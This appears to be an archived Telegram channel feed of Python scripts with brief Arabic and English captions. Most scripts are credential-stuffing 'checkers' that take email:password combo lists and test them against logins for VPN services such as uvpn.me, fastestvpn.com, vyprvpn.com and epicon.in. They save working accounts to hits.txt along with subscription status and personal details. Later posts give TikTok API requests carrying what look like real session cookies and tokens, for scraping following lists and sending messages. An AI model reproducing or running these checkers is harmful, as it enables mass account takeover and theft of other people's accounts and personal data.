5 090
订阅者
-1324 小时
-417 天
-33230 天
帖子存档
5 092
في مجلد تحط ملف ulp.txt اثين و ثلاث و تحطهم معه كود البوت وتشغل و فالبوت تختار من اي ulp تريد تستخرج
5 092
import requests
import json
ss = requests.Session()
combo = input('file combo : ')
try:
with open(combo,'r') as filee:
for frile in filee:
if ':' not in frile: continue
email,password = frile.strip().split(':')
url = "https://api.uvpn.me/manage/v1/auth"
payload = {
"email": email,
"password": password
}
headers = {
'User-Agent': "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Mobile Safari/537.36",
'Accept': "application/json, text/plain, */*",
'Accept-Encoding': "gzip, deflate, br, zstd",
'Content-Type': "application/json",
'sec-ch-ua-platform': "\"Android\"",
'sec-ch-ua': "\"Google Chrome\";v=\"147\", \"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"147\"",
'sec-ch-ua-mobile': "?1",
'origin': "https://manage.uvpn.me",
'sec-fetch-site': "same-site",
'sec-fetch-mode': "cors",
'sec-fetch-dest': "empty",
'referer': "https://manage.uvpn.me/",
'accept-language': "ar-IQ,ar;q=0.9,en-US;q=0.8,en;q=0.7",
'priority': "u=1, i",
}
response = ss.post(url, data=json.dumps(payload), headers=headers)
if 'User has been successfully authorized' in response.text:
token = response.json()['data']['token']
url = "https://api.uvpn.me/manage/v1/users/get"
headers = {
'User-Agent': "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Mobile Safari/537.36",
'Accept': "application/json, text/plain, */*",
'Accept-Encoding': "gzip, deflate, br, zstd",
'sec-ch-ua-platform': "\"Android\"",
'authorization': f"{token}",
'sec-ch-ua': "\"Google Chrome\";v=\"147\", \"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"147\"",
'sec-ch-ua-mobile': "?1",
'origin': "https://manage.uvpn.me",
'sec-fetch-site': "same-site",
'sec-fetch-mode': "cors",
'sec-fetch-dest': "empty",
'referer': "https://manage.uvpn.me/",
'accept-language': "ar-IQ,ar;q=0.9,en-US;q=0.8,en;q=0.7",
'priority': "u=1, i",
}
response = ss.get(url, headers=headers)
js = response.json()
subscribe = js['data']['subscription_status']
res = (
f"--- GOOD LOGIN ---\n"
f"Email: {email}:{password}\n"
f"Subscribe: {subscribe}\n"
f"-------------------"
)
print(res)
with open('hits.txt', 'a') as f:
f.write(f"{email}:{password} | Subscribe: {subscribe}\n")
else:
print(f'bad login : {email}:{password}')
except FileNotFoundError:
print('no conbo ')
check uvpn.me only needs a combo5 092
import requests
from fake_useragent import UserAgent
ua = UserAgent()
ss = requests.Session()
combo = 'o.txt'
try:
with open(combo, 'r') as filename:
for file in filename:
email,password = file.strip().split(':')
url = "https://www.epicon.in/loginwithpwd"
payload = {
'stdisdcode': " 91",
'mobilenumber': "{}".format(email),
'signup_method': "EMAIL",
'login_pwd': "{}".format(password),
'rememberme': "true"
}
headers = {
'User-Agent': ua.random,
'Accept': "application/json, text/javascript, */*; q=0.01",
'Accept-Encoding': "gzip, deflate, br, zstd",
'sec-ch-ua-platform': "\"Android\"",
'x-csrf-token': "",
'sec-ch-ua': "\"Google Chrome\";v=\"147\", \"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"147\"",
'sec-ch-ua-mobile': "?1",
'x-requested-with': "XMLHttpRequest",
'origin': "https://www.epicon.in",
'sec-fetch-site': "same-origin",
'sec-fetch-mode': "cors",
'sec-fetch-dest': "empty",
'referer': "https://www.epicon.in/login",
'accept-language': "ar-IQ,ar;q=0.9,en-US;q=0.8,en;q=0.7",
'priority': "u=1, i",
}
response = ss.post(url, data=payload, headers=headers)
if 'User Logged In Successfully' in response.text:
print('Good login : {}:{}'.format(email,password),response.text)
with open('hits.txt', 'a') as hit:
hit.write('{}:{}:{}\n'.format(email,password,response.text))
else:
print('bad login : {}:{}'.format(email,password),response.text)
except FileNotFoundError:
print('no combo ')
The source code has already been created, but the explanation is simple: just change the combo name to the one you own.5 092
How to create a checker on the epicon.in website That's all, and my best wishes to you.
5 092
import requests
combob = input('file combo : ')
try:
with open(combob, 'r') as filelist:
for file in filelist:
email,password = file.strip().split(':')
headers = {
"xplatform": "windows",
"Content-Type": "application/json; charset=UTF-8",
"Host": "api.fastestvpn.com"
}
payload = {"email": email, "password": password, "platform": "windows", "version": "Windows 10 Enterprise_22H2_19045", "dev": 1}
response = requests.post("https://api.fastestvpn.com/v2/authenticate", json=payload, headers=headers)
if 'You have successfully logged-in' in response.text:
print('------------------------')
userinfo = response.json()['data']['userinfo']
subscription = response.json()['data']['subscription']
print('good login : {}:{}\nName: {} {}\nSubscription: {}\nCity: {}\nState: {}'.format(email, password, userinfo['firstname'], userinfo['lastname'],subscription, userinfo['city'], userinfo['state']))
print('------------------------')
with open('hits.txt', 'a') as hit:
hit.write('{}:{}\nName: {} {}\nSubscription: {}\nCity: {}\nState: {}\n------------------------\n'.format(email, password, userinfo['firstname'], userinfo['lastname'],subscription, userinfo['city'], userinfo['state']))
else:
print('bad login : {}:{}'.format(email, password))
except FileNotFoundError:
print('no combo ')
check by fastestvpn.com nedd combo5 092
import requests
import json
combo = 'o.txt'
try:
with open(combo, 'r')as mustafa:
for must in mustafa:
email,password = must.strip().split(':')
url = "https://rest.symlextechnologies.com/client-portal-v2/login"
headers = {
"Host": "rest.symlextechnologies.com",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Content-Type": "application/json",
"Origin": "https://pay.symlexvpn.com",
"Referer": "https://pay.symlexvpn.com/",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "cross-site",
"Priority": "u=0",
"Te": "trailers"
}
data = {
"username": email,
"password": password
}
response = requests.post(url, headers=headers, json=data)
print('{}:{}'.format(email,password),response.text)
except FileNotFoundError:
print('no combo ')
symlexvpn.com checker5 092
import requests
import base64
import json
import time
from datetime import datetime
username = input('email or username : ')
password = input('passwrd : ')
url = "https://api.vyprvpn.com/platform-gf/oidc/token"
headers = {
"X-GF-PRODUCT": "VyprVPN",
"X-GF-PRODUCT-VERSION": "5.2.4.114336",
"X-GF-PLATFORM": "Android",
"X-GF-PLATFORM-VERSION": "9",
"locale": "en_US",
"Connection": "close",
"User-Agent": "Android/9 VyprVPN/5.2.4.114336",
"Content-Type": "application/x-www-form-urlencoded",
"Host": "api.vyprvpn.com",
"Accept-Encoding": "gzip"
}
data = "client_id=ph-mobile&client_secret=ph-mobile-secret&grant_type=password&username={}&password={}&scope=openid%20profile%20groups%20tenant".format(username, password)
response = requests.post(url, headers=headers, data=data)
print(response.text)
if 'id_token' in response.text:
print('Good login : {}:{}'.format(username,password))
Goku = response.json()['id_token']
parts = Goku.split('.')
payload = parts[1]
base64str = payload.replace('-', '+').replace('_', '/')
base64str += "=" * ((4 - len(base64str) % 4) % 4)
saiyan = base64.b64decode(base64str).decode('utf-8')
jwtpayload = json.loads(saiyan)
Vegeta = jwtpayload['customer_id']
url = "https://api.vyprvpn.com/platform-gf/api/subscription/customers/{}/subscriptions?q=is_terminated:false".format(Vegeta)
headers = {
"Authorization": "Bearer {}".format(Goku),
"X-GF-PRODUCT": "VyprVPN",
"X-GF-PRODUCT-VERSION": "5.2.4.114336",
"X-GF-PLATFORM": "Android",
"X-GF-PLATFORM-VERSION": "9",
"locale": "en_US",
"Connection": "close",
"User-Agent": "Android/9 VyprVPN/5.2.4.114336",
"Host": "api.vyprvpn.com",
"Accept-Encoding": "gzip"
}
response = requests.get(url, headers=headers)
print(response.text)
vegeta = response.json()['items'][0]
MajinVegeta = vegeta['id']
url = "https://api.vyprvpn.com/platform-gf/api/subscription/customers/{}/subscriptions/{}/actions/get-detail".format(Vegeta, MajinVegeta)
headers = {
"Authorization": "Bearer {}".format(Goku),
"X-GF-PRODUCT": "VyprVPN",
"X-GF-PRODUCT-VERSION": "5.2.4.114336",
"X-GF-PLATFORM": "Android",
"X-GF-PLATFORM-VERSION": "9",
"locale": "en_US",
"Connection": "close",
"User-Agent": "Android/9 VyprVPN/5.2.4.114336",
"Host": "api.vyprvpn.com",
"Accept-Encoding": "gzip"
}
response = requests.get(url, headers=headers)
print(response.text)
Rem = response.json()['currency']
else:
print('Bad login : {}:{}'.format(username,password))
Login vyprvpn.com
يحتاج بعد شغل بيه نقص كملو انتم
It needs work done but there's something missing You complete it5 092
uid_tt_ss=97fdffbb2e59ad5170287b472eec843cdd0c3dc6a45ceffd802c2bf1c223a15e; sid_tt=d6921a95d2a3624f9f8338eda2a47307; sessionid=d6921a95d2a3624f9f8338eda2a47307; sessionid_ss=d6921a95d2a3624f9f8338eda2a47307; tt_session_tlb_tag=sttt%7C2%7C1pIaldKjYk-fgzjtoqRzB__veBumEJ4Cc4MtcSqRDppFCH4y6lwibmNsn5lA-fTGD2E%3D; store-idc=alisg; store-country-code=iq; store-country-code-src=uid; tt-target-idc=alisg; install_id=7637816246880257813; ttreq=1$3137c19a2452c279229e099419e56982a62314da; passport_csrf_token=7fa7f3cc43ce8142a5e8225055ddac1b; passport_csrf_token_default=7fa7f3cc43ce8142a5e8225055ddac1b; tt_ticket_guard_has_set_public_key=1; odin_tt=de7e8c887633f66349cf722c3a86d654de1ee9b00d4e4cb79d0fbd3f36bf651e266d2ed7a64f2e287ab25221025209268d8b77fe51fc5780733d4202fe71d68aa62e6788406670373674d9613fc9b0dc; msToken=2dtYRYVz0Ilzst_D4yYMWbYKyUlQ5hA9H8Cp2FP9s537SSdos-OtRiBRIAq4kId8y9uJH4jEA9ewEELdIeG2-evemxDw1Fj-KykzdBw_9gZJKSHtBb0JlPFa; store-country-sign=MEIEDPdi-eLvTwBU3ErDmgQgemFvT_8I4E0AqIXj873HV6PlqWckSeqLnXyujyX1QUAEENkub6hoT2oBpfH5cAxpcPg" } response = requests.get(url, params=params, headers=headers) print(response.text) اتصالسحب يوزرات من المتابعهم تكدر تسوي ساحب
5 092
import requests url = "https://api19-normal-c-alisg.tiktokv.com/aweme/v1/user/following/list/" params = { 'user_id': "7630529387100603412", 'sec_user_id': "MS4wLjABAAAAGggo4cZaL4tXcLP97v44k_nhiPMoZ1oQHqJr8hRxdVXhI-CvFVh2zoQCx-ex3CRE", 'max_time': "1776876005", 'count': "40", 'offset': "0", 'source_type': "1", 'address_book_access': "1", 'page_token': "eyJtYXhfY3Vyc29yIjoxNzc4MzI3NTMwLCJtaW5fY3Vyc29yIjoxNzc2ODc2MDA1fQ==", 'live_sort_by': "1", 'experiment_config': "{}", 'os': "android", '_rticket': "1778328728028", 'is_pad': "0", 'last_install_time': "1778318312", 'ts': "1778328727", 'host_abi': "arm64-v8a", '': "" } headers = { 'User-Agent': "com.zhiliaoapp.musically/2024500030 (Linux; U; Android 7.1.2; ar; Pixel; Build/NHG47O; Cronet/TTNetVersion:41c3dc2f 2026-04-08 QuicVersion:f9fda2ef 2026-03-10)", 'x-ss-req-ticket': "1778328728032", 'x-tt-dm-status': "login=1;ct=1;rt=6", 'x-tt-pba-enable': "1", 'x-bd-kmsv': "0", 'x-opti-ut': "ClFmUDTtXEGYXKo0riK-sDPH2g06mcniDdOtbstrC5iEADO5vt83Dl61GdWu6NAYDFLfgACiZYeMSTpFn2VzUxLOfJrk0_hrXBc1OGtUcupZOdgaSQo8AAAAAAAAAAAAAFBmELdpZPYXfbmZEHAI7eZc2gWV41f32Qw8LVbzfKVbH1Z6LagkB3F_GV8_x39L5-TOEMyAkQ4YxLzzlg0iAQTN97kH", 'passport-sdk-version': "1", 'x-tt-token': "03d6921a95d2a3624f9f8338eda2a47307033cf106b8463e79f4b9066f3238eebf0da3c6ef6e1d65caf0859d6bb3abe20143d34bd2f8d9b12f28b655ae75ff2ec28075c4acc31d0e39b74af7701006c8bd2985886fc7dd948dbfbc50baa119008b058--0a4e0a20294f1c8aaa971e3ffa495cf86112f4181aeb7330e719d779a2ab85fcc94300b812205142161b3e21a23ac7be17be20c96e61cdaccb5b1c592f278b5b52def6c80ffd1801220674696b746f6b-3.0.1", 'sdk-version': "2", 'rpc-persist-pns-region-1': "US|6252001", 'rpc-persist-pns-region-2': "US|6252001", 'rpc-persist-pns-region-3': "US|6252001", 'oec-cs-si-a': "2", 'oec-cs-sdk-version': "v10.02.06-ov-android_V31", 'x-vc-bdturing-sdk-version': "2.4.2.i18n", 'oec-vc-sdk-version': "3.2.1.i18n", 'x-tt-request-tag': "n=0;nr=011;bg=0;s=-1;p=0", 'rpc-persist-pyxis-policy-v-tnc': "1", 'x-ss-dp': "1233", 'x-tt-trace-id': "00-0ca6f3981069fdeb7e2943860e5304d1-0ca6f3981069fdeb-01", 'x-argus': "Bt1EVz22sGHetYatu74u7DraJoR2o/++Gwgv+f3J0hC9mF1lFAobElrz0onZ7oKdpIUWGlF92ORbe4skSm14W5eNNkoPkb6n7RMu3bdD5vPZDKuiHC7UvigsUGcWqY3rNXuXcSKNGk07Os+l4YmT5QvD1EyxWfLr5XsskpGk7CHglTyVrKIcpko161GITGgaYSouKcaEvbkf/oHLjqFCzFcAJjGKII/4e72SQVluYfveWGPoWdA6sOxaH7TLfWgUu0yxbEEwRSQis3rVHS2nF/1lSIdm7rBz2X3r5sCT7AQDRkLvHbETqyu7+UItlum7mZPmO6nd/K+FHFFpYFIg5N35AVgDeXbiYFCHexKwitpJQDL4UYeiIn9F9ieV/LyYtsomT2yZAlGDq0U4h6MBzUGp3Ucg3vcsOjrHxYQ9EauW+2ifUNMSgS2pB6aKa35JuDgjbVpBahEiU1CtxuPEBJ90lgtD73j4QA/OYk7Snkr85SDPOjiV6+hRzChal6eqqTo6Hf+G4gInz9USs/qS8IQMOOnxmYHrNLEUM5e3ZiEmYD2KIKfHCgcvd1bqgxMWfYmyiZhAeiFwWgV/lQJiVLFhZw0jL01PTbg/daybaJ0haHFDhsnINrOMtr66AWScQVsblzLrjjPDvsRe/B0u2yWKSAqFi3XWRR7PRf7DMooP1LgiQNzyeM5UzwWv9qoPmAgAaN2CwZKaxuABGLvMyUtO2Ak5IVjXLiO+IXvlJUHv3w==", 'x-gorgon': "8404006710018f6f919d15fd05c914595c9809c0b007e24a491a", 'x-khronos': "1778328726", 'x-ladon': "Ql1nQbLp3DZy0ZKCp507dtfXZoJMsk0dztToWST+UjossXup", 'x-common-params-v2': "ab_version=45.0.3&ac=wifi&ac2=wifi&aid=1233&app_language=ar&app_name=musical_ly&app_type=normal&build_number=45.0.3&carrier_region=US&carrier_region_v2=311&channel=googleplay¤t_region=US&device_brand=Google&device_id=7637519470180926990&device_platform=android&device_type=Pixel&dpi=280&iid=7637816246880257813&language=ar&locale=ar&manifest_version_code=2024500030&mcc_mnc=311480&op_region=US&os_api=25&os_version=7.1.2®ion=JO&residence=US&resolution=1200*1916&ssmix=a&sys_region=JO&timezone_name=Asia%2FBaghdad&timezone_offset=10800&uoo=0&update_version_code=2024500030&version_code=450003&version_name=45.0.3", 'Cookie': "d_ticket=0510c12985b3f7ad1b1ef0c397cb15d4e59b1; multi_sids=7630529387100603412%3Ad6921a95d2a3624f9f8338eda2a47307; cmpl_token=AgQYAPOn_hfkT7C52_irFn1dLfOcck2G3L-M2WCnpws; sid_guard=d6921a95d2a3624f9f8338eda2a47307%7C1778319346%7C15551999%7CThu%2C+05-Nov-2026+09%3A35%3A45+GMT; uid_tt=97fdffbb2e59ad5170287b472eec843cdd0c3dc6a45ceffd802c2bf1c223a15e;
5 092
import requests url = "https://api16-normal-c-alisg.tiktokv.com/tiktok/v2/im/typing_recommendation" params = { 'raw_keyword': "plllop", 'sticker_ab_json': "ICAgICAgeyJwYXJhbXMiOiB7CiAgICAgICAgImRtc3RpY2tlcnNfc29ydGVyIjogewogICAgICAgICAgImRtc3RpY2tlcnNfcmVjYWxsIjogewogICAgICAgICAgICAiaG90X2Rtc3RpY2tlcnNfcmVjYWxsIjogewogICAgICAgICAgICAgICJlbmFibGUiOiB0cnVlLAogICAgICAgICAgICAgICJhYmFzZV90YWJsZSI6ICJjb3VudHJ5X2hvdCIKICAgICAgICAgICAgfQogICAgICAgICAgfQogICAgICAgIH0KICAgICAgfSwKICAgICAgInZlcnNpb24iOiAiMSIsCiAgICAgICJudW1fc3RpY2tlcnNfdmVyc2lvbiI6MiwKICAgICAgIm51bV9zdGlja2VycyI6MjUKICAgICAgfQ==", 'is_search': "false", 'hash_uid': "4467654735826896113", 'effect_ab_json': "", 'sa_sticker_ab_version': "1", 'to_userid': "60785799064530821", 'chat_type': "private", 'region': "us", 'network_type': "wifi", 'network_quality_type': "4", 'in_house_tenor': "true", 'client_version': "2024500030", 'scene': "chat", 'device_type': "Google Pixel", 'device_platform': "Android 7.1.2", 'os_language': "ar", 'os_type': "Android" } headers = { 'User-Agent': "com.zhiliaoapp.musically/2024500030 (Linux; U; Android 7.1.2; ar; Pixel; Build/NHG47O; Cronet/TTNetVersion:41c3dc2f 2026-04-08 QuicVersion:f9fda2ef 2026-03-10)", 'x-tt-request-tag': "s=-1;p=0", 'rpc-persist-pyxis-policy-v-tnc': "1", 'x-ss-dp': "1233", 'x-tt-trace-id': "00-0c9b2ce11069fdeb7e2943860e6204d1-0c9b2ce11069fdeb-01", 'x-gorgon': "84044013100137242104b440e9778a8d0172f02d0991757694a5", 'x-khronos': "1778327955", 'Cookie': "store-idc=alisg; store-country-code=iq; store-country-code-src=uid; tt-target-idc=alisg" } response = requests.get(url, params=params, headers=headers) print(response.text)اتصال ارسال رسائل تيك توك اخر اصدار
现已上线!2025 年 Telegram 研究 — 年度关键洞察 
